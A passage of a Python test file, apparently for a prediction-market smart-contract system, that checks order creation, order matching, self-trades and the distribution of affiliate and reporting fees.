assert fillOrderID == longTo32Bytes(1)
def test_two_bids_on_books_buy_one_full_then_create(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order 1
with BuyWithCash(cash, fix('12', '60'), contractsFixture.accounts[1], "create order"):
orderID1 = createOrder.publicCreateOrder(BID, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# create order 2
with BuyWithCash(cash, fix('7', '50'), contractsFixture.accounts[3], "create order"):
orderID2 = createOrder.publicCreateOrder(BID, fix(7), 50, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
# fill/create
with PrintGasUsed(contractsFixture, "buy one and create", 0):
with BuyWithCash(cash, fix('15', '40'), contractsFixture.accounts[2], "trade"):
fillOrderID = trade.publicTrade(SHORT,market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID1) == 0
assert orders.getPrice(orderID1) == 0
assert orders.getOrderCreator(orderID1) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID1) == 0
assert orders.getOrderSharesEscrowed(orderID1) == 0
assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
assert orders.getAmount(orderID2) == fix(7)
assert orders.getPrice(orderID2) == 50
assert orders.getOrderCreator(orderID2) == contractsFixture.accounts[3]
assert orders.getOrderMoneyEscrowed(orderID2) == fix('7', '50')
assert orders.getOrderSharesEscrowed(orderID2) == 0
assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
assert orders.getAmount(fillOrderID) == fix(3)
assert orders.getPrice(fillOrderID) == 60
assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[2]
assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('3', '40')
assert orders.getOrderSharesEscrowed(fillOrderID) == 0
assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_one_ask_on_books_buy_full_order(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order
with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "buy complete set"):
orderID = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# fill best order
with BuyWithCash(cash, fix('12', '60'), contractsFixture.accounts[2], "buy complete set"):
fillOrderID = trade.publicTrade(LONG, market.address, YES, fix(12), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
assert fillOrderID == longTo32Bytes(1)
def test_one_ask_on_books_buy_partial_order(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "create order"):
orderID = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
with BuyWithCash(cash, fix('7', '60'), contractsFixture.accounts[2], "fill best order"):
fillOrderID = trade.publicTrade(LONG, market.address, YES, fix(7), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID) == fix(5)
assert orders.getPrice(orderID) == 60
assert orders.getOrderCreator(orderID) == contractsFixture.accounts[1]
assert orders.getOrderMoneyEscrowed(orderID) == fix('5', '40')
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
assert fillOrderID == longTo32Bytes(1)
def test_one_ask_on_books_buy_excess_order(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order
with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "buy complete set"):
orderID = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# fill best order
with BuyWithCash(cash, fix('15', '60'), contractsFixture.accounts[2], "buy complete set"):
fillOrderID = trade.publicTrade(LONG,market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
assert orders.getAmount(fillOrderID) == fix(3)
assert orders.getPrice(fillOrderID) == 60
assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[2]
assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('3', '60')
assert orders.getOrderSharesEscrowed(fillOrderID) == 0
assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_two_asks_on_books_buy_both(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order 1
with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "buy complete set"):
orderID1 = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# create order 2
with BuyWithCash(cash, fix('3', '40'), contractsFixture.accounts[3], "buy complete set"):
orderID2 = createOrder.publicCreateOrder(ASK, fix(3), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
# fill best order
with BuyWithCash(cash, fix('15', '60'), contractsFixture.accounts[2], "buy complete set"):
fillOrderID = trade.publicTrade(LONG,market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID1) == 0
assert orders.getPrice(orderID1) == 0
assert orders.getOrderCreator(orderID1) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID1) == 0
assert orders.getOrderSharesEscrowed(orderID1) == 0
assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
assert orders.getAmount(orderID2) == 0
assert orders.getPrice(orderID2) == 0
assert orders.getOrderCreator(orderID2) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID2) == 0
assert orders.getOrderSharesEscrowed(orderID2) == 0
assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
assert fillOrderID == longTo32Bytes(1)
def test_two_asks_on_books_buy_full_and_partial(contractsFixture, cash, market):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order 1
with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "buy complete set"):
orderID1 = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# create order
with BuyWithCash(cash, fix('7', '40'), contractsFixture.accounts[3], "buy complete set"):
orderID2 = createOrder.publicCreateOrder(ASK, fix(7), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
# fill best order
with BuyWithCash(cash, fix('15', '60'), contractsFixture.accounts[2], "buy complete set"):
fillOrderID = trade.publicTrade(LONG,market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID1) == 0
assert orders.getPrice(orderID1) == 0
assert orders.getOrderCreator(orderID1) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID1) == 0
assert orders.getOrderSharesEscrowed(orderID1) == 0
assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
assert orders.getAmount(orderID2) == fix(4)
assert orders.getPrice(orderID2) == 60
assert orders.getOrderCreator(orderID2) == contractsFixture.accounts[3]
assert orders.getOrderMoneyEscrowed(orderID2) == fix('4', '40')
assert orders.getOrderSharesEscrowed(orderID2) == 0
assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
assert fillOrderID == longTo32Bytes(1)
def test_two_asks_on_books_buy_one_full_then_create(contractsFixture, cash, market):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order 1
with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "create order"):
orderID1 = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# create order 2
with BuyWithCash(cash, fix('7', '30'), contractsFixture.accounts[3], "create order"):
orderID2 = createOrder.publicCreateOrder(ASK, fix(7), 70, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
# fill/create
with BuyWithCash(cash, fix('15', '60'), contractsFixture.accounts[2], "fill and create order"):
fillOrderID = trade.publicTrade(LONG,market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID1) == 0
assert orders.getPrice(orderID1) == 0
assert orders.getOrderCreator(orderID1) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID1) == 0
assert orders.getOrderSharesEscrowed(orderID1) == 0
assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
assert orders.getAmount(orderID2) == fix(7)
assert orders.getPrice(orderID2) == 70
assert orders.getOrderCreator(orderID2) == contractsFixture.accounts[3]
assert orders.getOrderMoneyEscrowed(orderID2) == fix('7', '30')
assert orders.getOrderSharesEscrowed(orderID2) == 0
assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
assert orders.getAmount(fillOrderID) == fix(3)
assert orders.getPrice(fillOrderID) == 60
assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[2]
assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('3', '60')
assert orders.getOrderSharesEscrowed(fillOrderID) == 0
assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_take_best_order(contractsFixture, cash, market):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
# create order with cash
with BuyWithCash(cash, fix('1', '40'), contractsFixture.accounts[1], "create order"):
orderID = createOrder.publicCreateOrder(ASK, fix(1), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=contractsFixture.accounts[1])
assert orderID
# fill order with cash using on-chain matcher
with BuyWithCash(cash, fix('1', '60'), contractsFixture.accounts[2], "fill best order"):
assert trade.publicFillBestOrder(BID, market.address, YES, fix(1), 60, "43", 6, longTo32Bytes(11), sender=contractsFixture.accounts[2]) == 0
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
def test_take_best_order_multiple_orders(contractsFixture, cash, market):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
# create orders with cash
orderIDs = []
numOrders = 5
for i in range(numOrders):
with BuyWithCash(cash, fix('1', 40 - i), contractsFixture.accounts[1], "create order"):
orderID = createOrder.publicCreateOrder(ASK, fix(1), 60 + i, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=contractsFixture.accounts[1])
assert orderID
orderIDs.append(orderID)
# fill orders with cash using on-chain matcher
price = 60 + numOrders
with PrintGasUsed(contractsFixture, "fill multiple asks", 0):
# Fills across orders of differing prices, give it some eth to play with
assert cash.faucet(fix(numOrders, price), sender=contractsFixture.accounts[1])
assert trade.publicFillBestOrder(BID, market.address, YES, fix(numOrders), price, "43", 6, longTo32Bytes(11), sender=contractsFixture.accounts[1]) == 0
for i in range(numOrders):
orderID = orderIDs[i]
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
@mark.parametrize('withSelf', [
True,
False
])
def test_take_best_order_with_shares_escrowed_buy_with_cash(withSelf, contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
shareToken = contractsFixture.contracts['ShareToken']
shareToken = contractsFixture.contracts["ShareToken"]
# buy complete sets
sender = contractsFixture.accounts[2] if withSelf else contractsFixture.accounts[1]
account = contractsFixture.accounts[2] if withSelf else contractsFixture.accounts[1]
with BuyWithCash(cash, fix('1', '100'), sender, "buy complete set"):
assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=sender)
assert shareToken.balanceOfMarketOutcome(market.address, 0, account) == fix(1)
# create order with shares
orderID = createOrder.publicCreateOrder(ASK, fix(1), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=sender)
assert orderID
# fill order with cash using on-chain matcher
with PrintGasUsed(contractsFixture, "buy shares escrowed order", 0):
with BuyWithCash(cash, fix('1', '60'), contractsFixture.accounts[2], "fill best order"):
assert trade.publicFillBestOrder(BID, market.address, YES, fix(1), 60, "43", 6, longTo32Bytes(11), sender=contractsFixture.accounts[2]) == 0
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
def test_take_best_order_with_shares_escrowed_buy_with_shares_categorical(contractsFixture, cash, categoricalMarket, universe):
market = categoricalMarket
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
shareToken = contractsFixture.contracts['ShareToken']
shareToken = contractsFixture.contracts["ShareToken"]
# buy complete sets for both users
numTicks = market.getNumTicks()
with BuyWithCash(cash, fix('1', numTicks), contractsFixture.accounts[1], "buy complete set"):
assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=contractsFixture.accounts[1])
with BuyWithCash(cash, fix('1', numTicks), contractsFixture.accounts[2], "buy complete set"):
assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=contractsFixture.accounts[2])
assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[2]) == fix(1)
assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[2]) == fix(1)
assert shareToken.balanceOfMarketOutcome(market.address, 2, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 2, contractsFixture.accounts[2]) == fix(1)
# create order with shares
orderID = createOrder.publicCreateOrder(ASK, fix(1), 60, market.address, 0, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=contractsFixture.accounts[1])
assert orderID
# fill order with shares using on-chain matcher
totalProceeds = fix(1, numTicks)
totalProceeds -= fix(1, numTicks) / market.getMarketCreatorSettlementFeeDivisor()
totalProceeds -= fix(1, numTicks) / universe.getOrCacheReportingFeeDivisor()
expectedTester1Payout = totalProceeds * 60 / numTicks
expectedTester2Payout = totalProceeds * (numTicks - 60) / numTicks
with TokenDelta(cash, expectedTester1Payout, contractsFixture.accounts[1], "Tester 1 ETH delta wrong"):
with PrintGasUsed(contractsFixture, "categoricalFill", 0):
assert trade.publicFillBestOrder(BID, market.address, 0, fix(1), 60, "43", 6, longTo32Bytes(11), sender=contractsFixture.accounts[2]) == 0
assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[1]) == 0
assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[1]) == fix(1)
assert shareToken.balanceOfMarketOutcome(market.address, 2, contractsFixture.accounts[1]) == fix(1)
assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[2]) == fix(1)
assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[2]) == 0
assert shareToken.balanceOfMarketOutcome(market.address, 2, contractsFixture.accounts[2]) == 0
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
def test_trade_with_self(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
orderID = None
# create order
with BuyWithCash(cash, fix('4', '60'), contractsFixture.accounts[1], "create order"):
orderID = createOrder.publicCreateOrder(BID, fix(4), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# fill best order
orderFilledEventLog = {
"eventType": 2,
"addressData": [contractsFixture.accounts[1], contractsFixture.accounts[1]],
"uint256Data": [60, 0, YES, 0, 0, 0, fix(4), contractsFixture.contracts['Time'].getTimestamp(), 0, 0],
}
orderCreatedEventLog = {
"eventType": 0,
"addressData": [contractsFixture.accounts[1], nullAddress],
"uint256Data": [60, fix(1), YES, 0, 0, 0, 0, contractsFixture.contracts['Time'].getTimestamp(), 0, fix(1, 40)],
}
with BuyWithCash(cash, fix('5', '40'), contractsFixture.accounts[1], "trade"):
with AssertLog(contractsFixture, "OrderEvent", orderFilledEventLog):
with AssertLog(contractsFixture, "OrderEvent", orderCreatedEventLog, skip=1):
fillOrderID = trade.publicTrade(SHORT,market.address, YES, fix(5), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[1])
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
assert orders.getAmount(fillOrderID) == fix(1)
assert orders.getPrice(fillOrderID) == 60
assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[1]
assert orders.getOrderMoneyEscrowed(fillOrderID) == fix(1, 40)
assert orders.getOrderSharesEscrowed(fillOrderID) == 0
assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_trade_with_self_take_order_make_order(contractsFixture, cash, market):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order
createCost = fix('0.003', '60')
with BuyWithCash(cash, createCost, contractsFixture.accounts[1], "create order"):
orderID = createOrder.publicCreateOrder(ASK, fix('0.003'), 40, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# fill best order
takeCost = fix('1', '50')
with BuyWithCash(cash, takeCost, contractsFixture.accounts[1], "publicTrade"):
fillOrderID = trade.publicTrade(BID, market.address, YES, fix(1), 50, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[1])
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
orderAmount = fix(1) - fix('0.003')
assert orders.getAmount(fillOrderID) == orderAmount
assert orders.getPrice(fillOrderID) == 50
assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[1]
assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('0.997', 50)
# Note that we never ended up with the original orders shares. The ETH escrowed for those was simply returned to us for this case.
assert orders.getOrderSharesEscrowed(fillOrderID) == 0
assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
@mark.parametrize('isMatch', [
True,
False
])
def test_create_order_after_exhausting_book(isMatch, contractsFixture, cash, market):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create orders
createCost = fix('1', '60')
with BuyWithCash(cash, createCost, contractsFixture.accounts[1], "create order"):
orderID = createOrder.publicCreateOrder(ASK, fix('1'), 40, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
if isMatch:
createCost = fix('1', '50')
with BuyWithCash(cash, createCost, contractsFixture.accounts[1], "create matching order"):
orderID2 = createOrder.publicCreateOrder(ASK, fix('1'), 50, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
else:
createCost = fix('1', '30')
with BuyWithCash(cash, createCost, contractsFixture.accounts[1], "create non-matching order"):
orderID2 = createOrder.publicCreateOrder(ASK, fix('1'), 70, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# fill best order, isMatch determines if one of the orders
takeCost = fix('2', '60')
with BuyWithCash(cash, takeCost, contractsFixture.accounts[0], "trade"):
fillOrderID = trade.publicTrade(BID, market.address, YES, fix(2), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11))
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
if isMatch:
assert orders.getAmount(orderID2) == 0
assert orders.getPrice(orderID2) == 0
assert orders.getOrderCreator(orderID2) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID2) == 0
assert orders.getOrderSharesEscrowed(orderID2) == 0
assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
assert fillOrderID == longTo32Bytes(1)
else:
orderAmount = fix(1)
assert orders.getAmount(orderID2) == fix(1)
assert orders.getAmount(fillOrderID) == orderAmount
assert orders.getPrice(fillOrderID) == 60
assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[0]
assert orders.getOrderMoneyEscrowed(fillOrderID) == fix(60)
assert orders.getOrderSharesEscrowed(fillOrderID) == 0
assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
@mark.parametrize(('finalized', 'invalid'), [
(True, True),
(False, True),
(True, False),
(False, False),
])
def test_fees_from_trades(finalized, invalid, contractsFixture, cash, market, universe):
affiliates = contractsFixture.contracts['Affiliates']
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
shareToken = contractsFixture.contracts['ShareToken']
shareToken = contractsFixture.contracts["ShareToken"]
fingerprint = longTo32Bytes(11)
affiliateAddress = contractsFixture.accounts[3]
affiliates.setReferrer(affiliateAddress, longTo32Bytes(0), sender=contractsFixture.accounts[1])
affiliates.setReferrer(affiliateAddress, longTo32Bytes(0), sender=contractsFixture.accounts[2])
if finalized:
if invalid:
contractsFixture.contracts["Time"].setTimestamp(market.getDesignatedReportingEndTime() + 1)
market.doInitialReport([market.getNumTicks(), 0, 0], "", 0)
else:
proceedToNextRound(contractsFixture, market)
disputeWindow = contractsFixture.applySignature('DisputeWindow', market.getDisputeWindow())
contractsFixture.contracts["Time"].setTimestamp(disputeWindow.getEndTime() + 1)
assert market.finalize()
# buy complete sets for both users
numTicks = market.getNumTicks()
with BuyWithCash(cash, fix('1', numTicks), contractsFixture.accounts[1], "buy complete set"):
assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=contractsFixture.accounts[1])
with BuyWithCash(cash, fix('1', numTicks), contractsFixture.accounts[2], "buy complete set"):
assert shareToken.publicBuyCompleteSets(market.address, fix(1), sender=contractsFixture.accounts[2])
assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[2]) == fix(1)
assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[1]) == shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[2]) == fix(1)
# create order with shares
orderID = createOrder.publicCreateOrder(ASK, fix(1), 60, market.address, 0, longTo32Bytes(0), longTo32Bytes(0), longTo32Bytes(42), sender=contractsFixture.accounts[1])
assert orderID
expectedAffiliateFees = fix(100) / 400
sourceKickback = expectedAffiliateFees / 5
expectedAffiliateFees -= sourceKickback
cash.faucet(fix(60), sender=contractsFixture.accounts[2])
# Trade and specify an affiliate address.
if finalized:
if invalid:
nextDisputeWindowAddress = universe.getOrCreateNextDisputeWindow(False)
totalFees = fix(100) / 50 # Market fees + reporting fees
totalFees -= sourceKickback
with TokenDelta(cash, totalFees, nextDisputeWindowAddress, "Dispute Window did not recieve the correct fees"):
assert trade.publicFillBestOrder(BID, market.address, 0, fix(1), 60, "43", 6, fingerprint, sender=contractsFixture.accounts[2]) == 0
else:
with TokenDelta(cash, expectedAffiliateFees, contractsFixture.accounts[3], "Affiliate did not recieve the correct fees"):
assert trade.publicFillBestOrder(BID, market.address, 0, fix(1), 60, "43", 6, fingerprint, sender=contractsFixture.accounts[2]) == 0
else:
assert trade.publicFillBestOrder(BID, market.address, 0, fix(0.5), 60, "43", 6, fingerprint, sender=contractsFixture.accounts[2]) == 0
assert trade.publicFillBestOrder(BID, market.address, 0, fix(0.5), 60, "43", 6, fingerprint, sender=contractsFixture.accounts[2]) == 0
assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[1]) == 0
assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[1]) == fix(1)
# The second user sold the complete set they ended up holding from this transaction, which extracts fees
assert shareToken.balanceOfMarketOutcome(market.address, 0, contractsFixture.accounts[2]) == fix(1)
assert shareToken.balanceOfMarketOutcome(market.address, 1, contractsFixture.accounts[2]) == 0
if not finalized:
# We can confirm that the 3rd test account has an affiliate fee balance of 25% of the market creator fee 1% taken from the 1 ETH order
assert market.affiliateFeesAttoCash(contractsFixture.accounts[3]) == expectedAffiliateFees
# The affiliate can withdraw their fees only after the market is finalized as valid
with raises(TransactionFailed):
market.withdrawAffiliateFees(contractsFixture.accounts[3])
if invalid:
contractsFixture.contracts["Time"].setTimestamp(market.getDesignatedReportingEndTime() + 1)
market.doInitialReport([market.getNumTicks(), 0, 0], "", 0)
else:
proceedToNextRound(contractsFixture, market)
